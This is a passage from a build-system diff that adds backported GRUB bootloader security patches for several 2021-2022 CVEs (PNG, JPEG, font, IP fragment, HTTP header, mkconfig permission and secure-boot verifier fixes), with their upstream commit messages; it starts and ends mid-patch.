69- || !(data->is_gray || data->is_palette)))
70+ || !data->is_palette))
71 return grub_error (GRUB_ERR_BAD_FILE_TYPE,
72 "png: bit depth must be 8 or 16");
73
74@@ -315,7 +315,7 @@ grub_png_decode_image_header (struct grub_png_data *data)
75 }
76
77 #ifndef GRUB_CPU_WORDS_BIGENDIAN
78- if (data->is_16bit || data->is_gray || data->is_palette)
79+ if (data->is_16bit || data->is_palette)
80 #endif
81 {
82 data->image_data = grub_calloc (data->image_height, data->row_bytes);
83@@ -859,27 +859,8 @@ grub_png_convert_image (struct grub_png_data *data)
84 int shift;
85 int mask = (1 << data->color_bits) - 1;
86 unsigned j;
87- if (data->is_gray)
88- {
89- /* Generic formula is
90- (0xff * i) / ((1U << data->color_bits) - 1)
91- but for allowed bit depth of 1, 2 and for it's
92- equivalent to
93- (0xff / ((1U << data->color_bits) - 1)) * i
94- Precompute the multipliers to avoid division.
95- */
96-
97- const grub_uint8_t multipliers[5] = { 0xff, 0xff, 0x55, 0x24, 0x11 };
98- for (i = 0; i < (1U << data->color_bits); i++)
99- {
100- grub_uint8_t col = multipliers[data->color_bits] * i;
101- palette[i][0] = col;
102- palette[i][1] = col;
103- palette[i][2] = col;
104- }
105- }
106- else
107- grub_memcpy (palette, data->palette, 3 << data->color_bits);
108+
109+ grub_memcpy (palette, data->palette, 3 << data->color_bits);
110 d1c = d1;
111 d2c = d2;
112 for (j = 0; j < data->image_height; j++, d1c += data->image_width * 3,
113@@ -917,61 +898,7 @@ grub_png_convert_image (struct grub_png_data *data)
114 return;
115 }
116
117- if (data->is_gray)
118- {
119- switch (data->bpp)
120- {
121- case 4:
122- /* 16-bit gray with alpha. */
123- for (i = 0; i < (data->image_width * data->image_height);
124- i++, d1 += 4, d2 += 4)
125- {
126- d1[R4] = d2[3];
127- d1[G4] = d2[3];
128- d1[B4] = d2[3];
129- d1[A4] = d2[1];
130- }
131- break;
132- case 2:
133- if (data->is_16bit)
134- /* 16-bit gray without alpha. */
135- {
136- for (i = 0; i < (data->image_width * data->image_height);
137- i++, d1 += 4, d2 += 2)
138- {
139- d1[R3] = d2[1];
140- d1[G3] = d2[1];
141- d1[B3] = d2[1];
142- }
143- }
144- else
145- /* 8-bit gray with alpha. */
146- {
147- for (i = 0; i < (data->image_width * data->image_height);
148- i++, d1 += 4, d2 += 2)
149- {
150- d1[R4] = d2[1];
151- d1[G4] = d2[1];
152- d1[B4] = d2[1];
153- d1[A4] = d2[0];
154- }
155- }
156- break;
157- /* 8-bit gray without alpha. */
158- case 1:
159- for (i = 0; i < (data->image_width * data->image_height);
160- i++, d1 += 3, d2++)
161- {
162- d1[R3] = d2[0];
163- d1[G3] = d2[0];
164- d1[B3] = d2[0];
165- }
166- break;
167- }
168- return;
169- }
170-
171- {
172+ {
173 /* Only copy the upper 8 bit. */
174 #ifndef GRUB_CPU_WORDS_BIGENDIAN
175 for (i = 0; i < (data->image_width * data->image_height * data->bpp >> 1);
176--
1772.25.1
178
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3696.patch b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
new file mode 100644
index 0000000000..ef6da945c4
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
@@ -0,0 +1,46 @@
1From b18ce59d6496a9313d75f9497a0efac61dcf4191 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Wed, 20 Jul 2022 10:05:42 +0530
4Subject: [PATCH] CVE-2021-3696
5
6Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=210245129c932dc9e1c2748d9d35524fb95b5042]
7CVE: CVE-2021-3696
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10video/readers/png: Avoid heap OOB R/W inserting huff table items
11
12In fuzzing we observed crashes where a code would attempt to be inserted
13into a huffman table before the start, leading to a set of heap OOB reads
14and writes as table entries with negative indices were shifted around and
15the new code written in.
16
17Catch the case where we would underflow the array and bail.
18
19Fixes: CVE-2021-3696
20Signed-off-by: Daniel Axtens <dja@axtens.net>
21Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
22---
23 grub-core/video/readers/png.c | 7 +++++++
24 1 file changed, 7 insertions(+)
25
26diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
27index 36b3f10..3c05951 100644
28--- a/grub-core/video/readers/png.c
29+++ b/grub-core/video/readers/png.c
30@@ -416,6 +416,13 @@ grub_png_insert_huff_item (struct huff_table *ht, int code, int len)
31 for (i = len; i < ht->max_length; i++)
32 n += ht->maxval[i];
33
34+ if (n > ht->num_values)
35+ {
36+ grub_error (GRUB_ERR_BAD_FILE_TYPE,
37+ "png: out of range inserting huffman table item");
38+ return;
39+ }
40+
41 for (i = 0; i < n; i++)
42 ht->values[ht->num_values - i] = ht->values[ht->num_values - i - 1];
43
44--
452.25.1
46
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3697.patch b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
new file mode 100644
index 0000000000..be15e7d1f2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
@@ -0,0 +1,82 @@
1From 4de9de9d14f4ac27229e45514627534e32cc4406 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Tue, 19 Jul 2022 11:13:02 +0530
4Subject: [PATCH] CVE-2021-3697
5
6Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=22a3f97d39f6a10b08ad7fd1cc47c4dcd10413f6]
7CVE: CVE-2021-3697
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10video/readers/jpeg: Block int underflow -> wild pointer write
11
12Certain 1 px wide images caused a wild pointer write in
13grub_jpeg_ycrcb_to_rgb(). This was caused because in grub_jpeg_decode_data(),
14we have the following loop:
15
16for (; data->r1 < nr1 && (!data->dri || rst);
17 data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
18
19We did not check if vb * width >= hb * nc1.
20
21On a 64-bit platform, if that turns out to be negative, it will underflow,
22be interpreted as unsigned 64-bit, then be added to the 64-bit pointer, so
23we see data->bitmap_ptr jump, e.g.:
24
250x6180_0000_0480 to
260x6181_0000_0498
27 ^
28 ~--- carry has occurred and this pointer is now far away from
29 any object.
30
31On a 32-bit platform, it will decrement the pointer, creating a pointer
32that won't crash but will overwrite random data.
33
34Catch the underflow and error out.
35
36Fixes: CVE-2021-3697
37
38Signed-off-by: Daniel Axtens <dja@axtens.net>
39Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
40---
41 grub-core/video/readers/jpeg.c | 10 +++++++++-
42 1 file changed, 9 insertions(+), 1 deletion(-)
43
44diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
45index 31359a4..545a60b 100644
46--- a/grub-core/video/readers/jpeg.c
47+++ b/grub-core/video/readers/jpeg.c
48@@ -23,6 +23,7 @@
49 #include <grub/mm.h>
50 #include <grub/misc.h>
51 #include <grub/bufio.h>
52+#include <grub/safemath.h>
53
54 GRUB_MOD_LICENSE ("GPLv3+");
55
56@@ -617,6 +618,7 @@ static grub_err_t
57 grub_jpeg_decode_data (struct grub_jpeg_data *data)
58 {
59 unsigned c1, vb, hb, nr1, nc1;
60+ unsigned stride_a, stride_b, stride;
61 int rst = data->dri;
62
63 vb = 8 << data->log_vs;
64@@ -624,8 +626,14 @@ grub_jpeg_decode_data (struct grub_jpeg_data *data)
65 nr1 = (data->image_height + vb - 1) >> (3 + data->log_vs);
66 nc1 = (data->image_width + hb - 1) >> (3 + data->log_hs);
67
68+ if (grub_mul(vb, data->image_width, &stride_a) ||
69+ grub_mul(hb, nc1, &stride_b) ||
70+ grub_sub(stride_a, stride_b, &stride))
71+ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
72+ "jpeg: cannot decode image with these dimensions");
73+
74 for (; data->r1 < nr1 && (!data->dri || rst);
75- data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
76+ data->r1++, data->bitmap_ptr += stride * 3)
77 for (c1 = 0; c1 < nc1 && (!data->dri || rst);
78 c1++, rst--, data->bitmap_ptr += hb * 3)
79 {
80--
812.25.1
82
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3981.patch b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
new file mode 100644
index 0000000000..e27027ea65
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
@@ -0,0 +1,32 @@
1From 67740c43c9326956ea5cd6be77f813b5499a56a5 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 27 Jun 2022 10:15:29 +0530
4Subject: [PATCH] CVE-2021-3981
5
6Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/diff/util/grub-mkconfig.in?id=0adec29674561034771c13e446069b41ef41e4d4]
7CVE: CVE-2021-3981
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 util/grub-mkconfig.in | 6 +++++-
11 1 file changed, 5 insertions(+), 1 deletion(-)
12
13diff --git a/util/grub-mkconfig.in b/util/grub-mkconfig.in
14index 9f477ff..ead94a6 100644
15--- a/util/grub-mkconfig.in
16+++ b/util/grub-mkconfig.in
17@@ -287,7 +287,11 @@ and /etc/grub.d/* files or please file a bug report with
18 exit 1
19 else
20 # none of the children aborted with error, install the new grub.cfg
21- mv -f ${grub_cfg}.new ${grub_cfg}
22+ oldumask=$(umask)
23+ umask 077
24+ cat ${grub_cfg}.new > ${grub_cfg}
25+ umask $oldumask
26+ rm -f ${grub_cfg}.new
27 fi
28 fi
29
30--
312.25.1
32
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-2601.patch b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
new file mode 100644
index 0000000000..090f693be3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
@@ -0,0 +1,87 @@
1From e8060722acf0bcca037982d7fb29472363ccdfd4 Mon Sep 17 00:00:00 2001
2From: Zhang Boyang <zhangboyang.id@gmail.com>
3Date: Fri, 5 Aug 2022 01:58:27 +0800
4Subject: [PATCH] font: Fix several integer overflows in
5 grub_font_construct_glyph()
6
7This patch fixes several integer overflows in grub_font_construct_glyph().
8Glyphs of invalid size, zero or leading to an overflow, are rejected.
9The inconsistency between "glyph" and "max_glyph_size" when grub_malloc()
10returns NULL is fixed too.
11
12Fixes: CVE-2022-2601
13
14Reported-by: Zhang Boyang <zhangboyang.id@gmail.com>
15Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
16Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
17
18Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
19
20Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=768e1ef2fc159f6e14e7246e4be09363708ac39e]
21CVE: CVE-2022-2601
22Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
23---
24 grub-core/font/font.c | 29 +++++++++++++++++------------
25 1 file changed, 17 insertions(+), 12 deletions(-)
26
27diff --git a/grub-core/font/font.c b/grub-core/font/font.c
28index df17dba..f110db9 100644
29--- a/grub-core/font/font.c
30+++ b/grub-core/font/font.c
31@@ -1509,6 +1509,7 @@ grub_font_construct_glyph (grub_font_t hinted_font,
32 struct grub_video_signed_rect bounds;
33 static struct grub_font_glyph *glyph = 0;
34 static grub_size_t max_glyph_size = 0;
35+ grub_size_t cur_glyph_size;
36
37 ensure_comb_space (glyph_id);
38
39@@ -1525,29 +1526,33 @@ grub_font_construct_glyph (grub_font_t hinted_font,
40 if (!glyph_id->ncomb && !glyph_id->attributes)
41 return main_glyph;
42
43- if (max_glyph_size < sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT)
44+ if (grub_video_bitmap_calc_1bpp_bufsz (bounds.width, bounds.height, &cur_glyph_size) ||
45+ grub_add (sizeof (*glyph), cur_glyph_size, &cur_glyph_size))
46+ return main_glyph;
47+
48+ if (max_glyph_size < cur_glyph_size)
49 {
50 grub_free (glyph);
51- max_glyph_size = (sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT) * 2;
52- if (max_glyph_size < 8)
53- max_glyph_size = 8;
54- glyph = grub_malloc (max_glyph_size);
55+ if (grub_mul (cur_glyph_size, 2, &max_glyph_size))
56+ max_glyph_size = 0;
57+ glyph = max_glyph_size > 0 ? grub_malloc (max_glyph_size) : NULL;
58 }
59 if (!glyph)
60 {
61+ max_glyph_size = 0;
62 grub_errno = GRUB_ERR_NONE;
63 return main_glyph;
64 }
65
66- grub_memset (glyph, 0, sizeof (*glyph)
67- + (bounds.width * bounds.height
68- + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT);
69+ grub_memset (glyph, 0, cur_glyph_size);
70
71 glyph->font = main_glyph->font;
72- glyph->width = bounds.width;
73- glyph->height = bounds.height;
74- glyph->offset_x = bounds.x;
75- glyph->offset_y = bounds.y;
76+ if (bounds.width == 0 || bounds.height == 0 ||
77+ grub_cast (bounds.width, &glyph->width) ||
78+ grub_cast (bounds.height, &glyph->height) ||
79+ grub_cast (bounds.x, &glyph->offset_x) ||
80+ grub_cast (bounds.y, &glyph->offset_y))
81+ return main_glyph;
82
83 if (glyph_id->attributes & GRUB_UNICODE_GLYPH_ATTRIBUTE_MIRROR)
84 grub_font_blit_glyph_mirror (glyph, main_glyph,
85--
862.25.1
87
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28733.patch b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
new file mode 100644
index 0000000000..6cfdf20e2d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
@@ -0,0 +1,60 @@
1From 415fb5eb83cbd3b5cfc25ac1290f2de4fe3d231c Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 1 Aug 2022 10:48:34 +0530
4Subject: [PATCH] CVE-2022-28733
5
6Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=3e4817538de828319ba6d59ced2fbb9b5ca13287]
7CVE: CVE-2022-28733
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10net/ip: Do IP fragment maths safely
11
12We can receive packets with invalid IP fragmentation information. This
13can lead to rsm->total_len underflowing and becoming very large.
14
15Then, in grub_netbuff_alloc(), we add to this very large number, which can
16cause it to overflow and wrap back around to a small positive number.
17The allocation then succeeds, but the resulting buffer is too small and
18subsequent operations can write past the end of the buffer.
19
20Catch the underflow here.
21
22Fixes: CVE-2022-28733
23
24Signed-off-by: Daniel Axtens <dja@axtens.net>
25Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
26---
27 grub-core/net/ip.c | 10 +++++++++-
28 1 file changed, 9 insertions(+), 1 deletion(-)
29
30diff --git a/grub-core/net/ip.c b/grub-core/net/ip.c
31index ea5edf8..74e4e8b 100644
32--- a/grub-core/net/ip.c
33+++ b/grub-core/net/ip.c
34@@ -25,6 +25,7 @@
35 #include <grub/net/netbuff.h>
36 #include <grub/mm.h>
37 #include <grub/priority_queue.h>
38+#include <grub/safemath.h>
39 #include <grub/time.h>
40
41 struct iphdr {
42@@ -512,7 +513,14 @@ grub_net_recv_ip4_packets (struct grub_net_buff *nb,
43 {
44 rsm->total_len = (8 * (grub_be_to_cpu16 (iph->frags) & OFFSET_MASK)
45 + (nb->tail - nb->data));
46- rsm->total_len -= ((iph->verhdrlen & 0xf) * sizeof (grub_uint32_t));
47+
48+ if (grub_sub (rsm->total_len, (iph->verhdrlen & 0xf) * sizeof (grub_uint32_t),
49+ &rsm->total_len))
50+ {
51+ grub_dprintf ("net", "IP reassembly size underflow\n");
52+ return GRUB_ERR_NONE;
53+ }
54+
55 rsm->asm_netbuff = grub_netbuff_alloc (rsm->total_len);
56 if (!rsm->asm_netbuff)
57 {
58--
592.25.1
60
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28734.patch b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
new file mode 100644
index 0000000000..577ec10bea
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
@@ -0,0 +1,67 @@
1From f03f09c2a07eae7f3a4646e33a406ae2689afb9e Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 1 Aug 2022 10:59:41 +0530
4Subject: [PATCH] CVE-2022-28734
5
6Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=b26b4c08e7119281ff30d0fb4a6169bd2afa8fe4]
7CVE: CVE-2022-28734
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10net/http: Fix OOB write for split http headers
11
12GRUB has special code for handling an http header that is split
13across two packets.
14
15The code tracks the end of line by looking for a "\n" byte. The
16code for split headers has always advanced the pointer just past the
17end of the line, whereas the code that handles unsplit headers does
18not advance the pointer. This extra advance causes the length to be
19one greater, which breaks an assumption in parse_line(), leading to
20it writing a NUL byte one byte past the end of the buffer where we
21reconstruct the line from the two packets.
22
23It's conceivable that an attacker controlled set of packets could
24cause this to zero out the first byte of the "next" pointer of the
25grub_mm_region structure following the current_line buffer.
26
27Do not advance the pointer in the split header case.
28
29Fixes: CVE-2022-28734
30---
31 grub-core/net/http.c | 12 +++++++++---
32 1 file changed, 9 insertions(+), 3 deletions(-)
33
34diff --git a/grub-core/net/http.c b/grub-core/net/http.c
35index 5aa4ad3..a220d21 100644
36--- a/grub-core/net/http.c
37+++ b/grub-core/net/http.c
38@@ -68,7 +68,15 @@ parse_line (grub_file_t file, http_data_t data, char *ptr, grub_size_t len)
39 char *end = ptr + len;
40 while (end > ptr && *(end - 1) == '\r')
41 end--;
42+
43+ /* LF without CR. */
44+ if (end == ptr + len)
45+ {
46+ data->errmsg = grub_strdup (_("invalid HTTP header - LF without CR"));
47+ return GRUB_ERR_NONE;
48+ }
49 *end = 0;
50+
51 /* Trailing CRLF. */
52 if (data->in_chunk_len == 1)
53 {
54@@ -190,9 +198,7 @@ http_receive (grub_net_tcp_socket_t sock __attribute__ ((unused)),
55 int have_line = 1;
56 char *t;
57 ptr = grub_memchr (nb->data, '\n', nb->tail - nb->data);
58- if (ptr)
59- ptr++;
60- else
61+ if (ptr == NULL)
62 {
63 have_line = 0;
64 ptr = (char *) nb->tail;
65--
662.25.1
67
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28735.patch b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
new file mode 100644
index 0000000000..89b653a8da
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
@@ -0,0 +1,271 @@
1From 6fe755c5c07bb386fda58306bfd19e4a1c974c53 Mon Sep 17 00:00:00 2001
2From: Julian Andres Klode <julian.klode@canonical.com>
3Date: Thu, 2 Dec 2021 15:03:53 +0100
4Subject: kern/efi/sb: Reject non-kernel files in the shim_lock verifier
5
6Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6fe755c5c07bb386fda58306bfd19e4a1c974c53]
7CVE: CVE-2022-28735
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10We must not allow other verifiers to pass things like the GRUB modules.
11Instead of maintaining a blocklist, maintain an allowlist of things
12that we do not care about.
13
14This allowlist really should be made reusable, and shared by the
15lockdown verifier, but this is the minimal patch addressing
16security concerns where the TPM verifier was able to mark modules
17as verified (or the OpenPGP verifier for that matter), when it
18should not do so on shim-powered secure boot systems.
19
20Fixes: CVE-2022-28735
21
22Signed-off-by: Julian Andres Klode <julian.klode@canonical.com>
23Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
24---
25 grub-core/kern/efi/sb.c | 221 ++++++++++++++++++++++++++++++++++++++++
26 include/grub/verify.h | 1 +
27 2 files changed, 222 insertions(+)
28 create mode 100644 grub-core/kern/efi/sb.c
29
30diff --git a/grub-core/kern/efi/sb.c b/grub-core/kern/efi/sb.c
31new file mode 100644
32index 0000000..89c4bb3
33--- /dev/null
34+++ b/grub-core/kern/efi/sb.c
35@@ -0,0 +1,221 @@
36+/*
37+ * GRUB -- GRand Unified Bootloader
38+ * Copyright (C) 2020 Free Software Foundation, Inc.
39+ *
40+ * GRUB is free software: you can redistribute it and/or modify
41+ * it under the terms of the GNU General Public License as published by
42+ * the Free Software Foundation, either version 3 of the License, or
43+ * (at your option) any later version.
44+ *
45+ * GRUB is distributed in the hope that it will be useful,
46+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
47+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
48+ * GNU General Public License for more details.
49+ *
50+ * You should have received a copy of the GNU General Public License
51+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
52+ *
53+ * UEFI Secure Boot related checkings.
54+ */
55+
56+#include <grub/efi/efi.h>
57+#include <grub/efi/pe32.h>
58+#include <grub/efi/sb.h>
59+#include <grub/env.h>
60+#include <grub/err.h>
61+#include <grub/file.h>
62+#include <grub/i386/linux.h>
63+#include <grub/kernel.h>
64+#include <grub/mm.h>
65+#include <grub/types.h>
66+#include <grub/verify.h>
67+
68+static grub_efi_guid_t shim_lock_guid = GRUB_EFI_SHIM_LOCK_GUID;
69+
70+/*
71+ * Determine whether we're in secure boot mode.
72+ *
73+ * Please keep the logic in sync with the Linux kernel,
74+ * drivers/firmware/efi/libstub/secureboot.c:efi_get_secureboot().
75+ */
76+grub_uint8_t
77+grub_efi_get_secureboot (void)
78+{
79+ static grub_efi_guid_t efi_variable_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
80+ grub_efi_status_t status;
81+ grub_efi_uint32_t attr = 0;
82+ grub_size_t size = 0;
83+ grub_uint8_t *secboot = NULL;
84+ grub_uint8_t *setupmode = NULL;
85+ grub_uint8_t *moksbstate = NULL;
86+ grub_uint8_t secureboot = GRUB_EFI_SECUREBOOT_MODE_UNKNOWN;
87+ const char *secureboot_str = "UNKNOWN";
88+
89+ status = grub_efi_get_variable ("SecureBoot", &efi_variable_guid,
90+ &size, (void **) &secboot);
91+
92+ if (status == GRUB_EFI_NOT_FOUND)
93+ {
94+ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
95+ goto out;
96+ }
97+
98+ if (status != GRUB_EFI_SUCCESS)
99+ goto out;
100+
101+ status = grub_efi_get_variable ("SetupMode", &efi_variable_guid,
102+ &size, (void **) &setupmode);
103+
104+ if (status != GRUB_EFI_SUCCESS)
105+ goto out;
106+
107+ if ((*secboot == 0) || (*setupmode == 1))
108+ {
109+ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
110+ goto out;
111+ }
112+
113+ /*
114+ * See if a user has put the shim into insecure mode. If so, and if the
115+ * variable doesn't have the runtime attribute set, we might as well
116+ * honor that.
117+ */
118+ status = grub_efi_get_variable_with_attributes ("MokSBState", &shim_lock_guid,
119+ &size, (void **) &moksbstate, &attr);
120+
121+ /* If it fails, we don't care why. Default to secure. */
122+ if (status != GRUB_EFI_SUCCESS)
123+ {
124+ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
125+ goto out;
126+ }
127+
128+ if (!(attr & GRUB_EFI_VARIABLE_RUNTIME_ACCESS) && *moksbstate == 1)
129+ {
130+ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
131+ goto out;
132+ }
133+
134+ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
135+
136+ out:
137+ grub_free (moksbstate);
138+ grub_free (setupmode);
139+ grub_free (secboot);
140+
141+ if (secureboot == GRUB_EFI_SECUREBOOT_MODE_DISABLED)
142+ secureboot_str = "Disabled";
143+ else if (secureboot == GRUB_EFI_SECUREBOOT_MODE_ENABLED)
144+ secureboot_str = "Enabled";
145+
146+ grub_dprintf ("efi", "UEFI Secure Boot state: %s\n", secureboot_str);
147+
148+ return secureboot;
149+}
150+
151+static grub_err_t
152+shim_lock_verifier_init (grub_file_t io __attribute__ ((unused)),
153+ enum grub_file_type type,
154+ void **context __attribute__ ((unused)),
155+ enum grub_verify_flags *flags)
156+{
157+ *flags = GRUB_VERIFY_FLAGS_NONE;
158+
159+ switch (type & GRUB_FILE_TYPE_MASK)
160+ {
161+ /* Files we check. */
162+ case GRUB_FILE_TYPE_LINUX_KERNEL:
163+ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
164+ case GRUB_FILE_TYPE_BSD_KERNEL:
165+ case GRUB_FILE_TYPE_XNU_KERNEL:
166+ case GRUB_FILE_TYPE_PLAN9_KERNEL:
167+ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
168+ *flags = GRUB_VERIFY_FLAGS_SINGLE_CHUNK;
169+ return GRUB_ERR_NONE;
170+
171+ /* Files that do not affect secureboot state. */
172+ case GRUB_FILE_TYPE_NONE:
173+ case GRUB_FILE_TYPE_LOOPBACK:
174+ case GRUB_FILE_TYPE_LINUX_INITRD:
175+ case GRUB_FILE_TYPE_OPENBSD_RAMDISK:
176+ case GRUB_FILE_TYPE_XNU_RAMDISK:
177+ case GRUB_FILE_TYPE_SIGNATURE:
178+ case GRUB_FILE_TYPE_PUBLIC_KEY:
179+ case GRUB_FILE_TYPE_PUBLIC_KEY_TRUST:
180+ case GRUB_FILE_TYPE_PRINT_BLOCKLIST:
181+ case GRUB_FILE_TYPE_TESTLOAD:
182+ case GRUB_FILE_TYPE_GET_SIZE:
183+ case GRUB_FILE_TYPE_FONT:
184+ case GRUB_FILE_TYPE_ZFS_ENCRYPTION_KEY:
185+ case GRUB_FILE_TYPE_CAT:
186+ case GRUB_FILE_TYPE_HEXCAT:
187+ case GRUB_FILE_TYPE_CMP:
188+ case GRUB_FILE_TYPE_HASHLIST:
189+ case GRUB_FILE_TYPE_TO_HASH:
190+ case GRUB_FILE_TYPE_KEYBOARD_LAYOUT:
191+ case GRUB_FILE_TYPE_PIXMAP:
192+ case GRUB_FILE_TYPE_GRUB_MODULE_LIST:
193+ case GRUB_FILE_TYPE_CONFIG:
194+ case GRUB_FILE_TYPE_THEME:
195+ case GRUB_FILE_TYPE_GETTEXT_CATALOG:
196+ case GRUB_FILE_TYPE_FS_SEARCH:
197+ case GRUB_FILE_TYPE_LOADENV:
198+ case GRUB_FILE_TYPE_SAVEENV:
199+ case GRUB_FILE_TYPE_VERIFY_SIGNATURE:
200+ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
201+ return GRUB_ERR_NONE;
202+
203+ /* Other files. */
204+ default:
205+ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("prohibited by secure boot policy"));
206+ }
207+}
208+
209+static grub_err_t
210+shim_lock_verifier_write (void *context __attribute__ ((unused)), void *buf, grub_size_t size)
211+{
212+ grub_efi_shim_lock_protocol_t *sl = grub_efi_locate_protocol (&shim_lock_guid, 0);
213+
214+ if (!sl)
215+ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("shim_lock protocol not found"));
216+
217+ if (sl->verify (buf, size) != GRUB_EFI_SUCCESS)
218+ return grub_error (GRUB_ERR_BAD_SIGNATURE, N_("bad shim signature"));
219+
220+ return GRUB_ERR_NONE;
221+}
222+
223+struct grub_file_verifier shim_lock_verifier =
224+ {
225+ .name = "shim_lock_verifier",
226+ .init = shim_lock_verifier_init,
227+ .write = shim_lock_verifier_write
228+ };
229+
230+void
231+grub_shim_lock_verifier_setup (void)
232+{
233+ struct grub_module_header *header;
234+ grub_efi_shim_lock_protocol_t *sl =
235+ grub_efi_locate_protocol (&shim_lock_guid, 0);
236+
237+ /* shim_lock is missing, check if GRUB image is built with --disable-shim-lock. */
238+ if (!sl)
239+ {
240+ FOR_MODULES (header)
241+ {
242+ if (header->type == OBJ_TYPE_DISABLE_SHIM_LOCK)
243+ return;
244+ }
245+ }
246+
247+ /* Secure Boot is off. Do not load shim_lock. */
248+ if (grub_efi_get_secureboot () != GRUB_EFI_SECUREBOOT_MODE_ENABLED)
249+ return;
250+
251+ /* Enforce shim_lock_verifier. */
252+ grub_verifier_register (&shim_lock_verifier);
253+
254+ grub_env_set ("shim_lock", "y");
255+ grub_env_export ("shim_lock");
256+}
257diff --git a/include/grub/verify.h b/include/grub/verify.h
258index cd129c3..672ae16 100644
259--- a/include/grub/verify.h
260+++ b/include/grub/verify.h
261@@ -24,6 +24,7 @@
262
263 enum grub_verify_flags
264 {
265+ GRUB_VERIFY_FLAGS_NONE = 0,
266 GRUB_VERIFY_FLAGS_SKIP_VERIFICATION = 1,
267 GRUB_VERIFY_FLAGS_SINGLE_CHUNK = 2,
268 /* Defer verification to another authority. */
269--
2702.25.1
271
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28736.patch b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
new file mode 100644
index 0000000000..4fc9fdaf05
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
@@ -0,0 +1,275 @@
1From 431a111c60095fc973d83fe9209f26f29ce78784 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 1 Aug 2022 11:17:17 +0530
4Subject: [PATCH] CVE-2022-28736
5
6Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=04c86e0bb7b58fc2f913f798cdb18934933e532d]
7CVE: CVE-2022-28736
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10loader/efi/chainloader: Use grub_loader_set_ex()
11
12This ports the EFI chainloader to use grub_loader_set_ex() in order to fix
